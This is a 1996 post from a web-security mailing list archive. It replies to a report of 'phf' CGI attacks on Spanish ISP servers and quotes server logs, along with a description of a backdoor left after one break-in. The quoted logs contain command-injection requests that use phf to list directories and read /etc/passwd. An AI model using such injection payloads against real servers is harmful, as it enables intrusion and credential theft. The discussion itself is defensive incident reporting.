[3414] in WWW Security List Archive
Re: 'phf' cgi-bin attack
daemon@ATHENA.MIT.EDU (Doug Breault)
Wed Oct 30 19:49:45 1996
Date: Wed, 30 Oct 1996 17:38:17 -0500 (EST)
From: Doug Breault <dbreault@ns.sprintout.com>
To: "Jordi \"=?iso-8859-1?Q?Matem=E0tic?=\" Salvat" <jordi@webarna.com>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <323DD2B8.4EAC@webarna.com>
Errors-To: owner-www-security@ns2.rutgers.edu
I feel like I'm having deja vu all over again...didn't this same message
come across about 6 months ago??? Read the archive yet???
On Mon, 16 Sep 1996, Jordi "[iso-8859-1] Matem=E0tic" Salvat wrote:
> Many Spanish ISPs are receiving attack attempts on their WWW servers...
> they detect them on their log files in entries such as:
>=20
> info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
> infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> ia245.arrakis.es - - [04/Sep/1996:14:45:35 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> modem5.mrbit.es - - [09/Sep/1996:06:15:21 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> ppp03.las.es - - [12/Sep/1996:20:17:22 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>=20
> Obviously attempting to get the passwd file.
>=20
> What is curious about these attacks is that they all come from different
> dial-up providers, from users apparently scattered throughout Spain.
> Maybe an "organized" group who meets and exchanges ideas over the I-net?
> There has also been a few attempts apparently comming from the US. Of
> course most providers have initiated action to find out who those
> cracker-apprentices are, and warn them that what they are doing is a
> delict under the new Spanish Penal Laws.
>=20
> At lease one of these attacks has been successful. The hacker then
> reportedly managed to find out root password (bad password choice?) and
> replaced the getty and getty to leave a 'backdoor'. The hacker was
> reportedly invisible to 'who' and 'last', so the only way to know
> whether he was logged in was to look at the process list.
>=20
> Does anyone know what this 'phf' cgi-bin is supposed to be?
>=20
> Thanks for your help.
> --=20
> Jordi Salvat i Alabart
> Web Edicions Barcelona
> edicions i consultoria Internet
> http://www.webarna.com
>=20
>=20
>=20
